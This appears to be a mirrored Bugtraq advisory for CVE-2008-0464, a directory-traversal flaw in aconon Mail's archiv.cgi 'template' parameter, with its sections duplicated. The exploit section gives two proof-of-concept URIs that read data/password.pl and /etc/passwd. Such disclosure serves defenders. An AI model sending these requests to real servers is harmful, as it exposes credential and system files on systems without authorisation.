aconon Mail Template Parameter Directory Traversal Vulnerability
BID:27427
Info
aconon Mail Template Parameter Directory Traversal Vulnerability
| Bugtraq ID: | 27427 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0464 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 23 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | Arno Toll discovered this issue. |
| Vulnerable: |
absofort aconon Mail 2007 Enterprise SQL 11.7 absofort aconon Mail 2004 Enterprise SQL 11.5.1 |
| Not Vulnerable: | |
Discussion
aconon Mail Template Parameter Directory Traversal Vulnerability
aconon Mail is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue may allow an attacker to access sensitive information that could aid in further attacks.
The issue affects aconon Mail 2007 Enterprise SQL 11.7.0 and 2004 Enterprise SQL 11.5.1; other versions may also be vulnerable.
aconon Mail is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue may allow an attacker to access sensitive information that could aid in further attacks.
The issue affects aconon Mail 2007 Enterprise SQL 11.7.0 and 2004 Enterprise SQL 11.5.1; other versions may also be vulnerable.
Exploit / POC
aconon Mail Template Parameter Directory Traversal Vulnerability
An attacker can exploit this issue via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=data/password.pl&link=%3C%3C%3C%3C http://www.example.com/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=../../../../../../etc/passwd&link=%3C%3C%3C%3C
An attacker can exploit this issue via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=data/password.pl&link=%3C%3C%3C%3C http://www.example.com/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=../../../../../../etc/passwd&link=%3C%3C%3C%3C
Solution / Fix
aconon Mail Template Parameter Directory Traversal Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
aconon Mail Template Parameter Directory Traversal Vulnerability
References:
References:
- aconon Mail Homepage (absofort)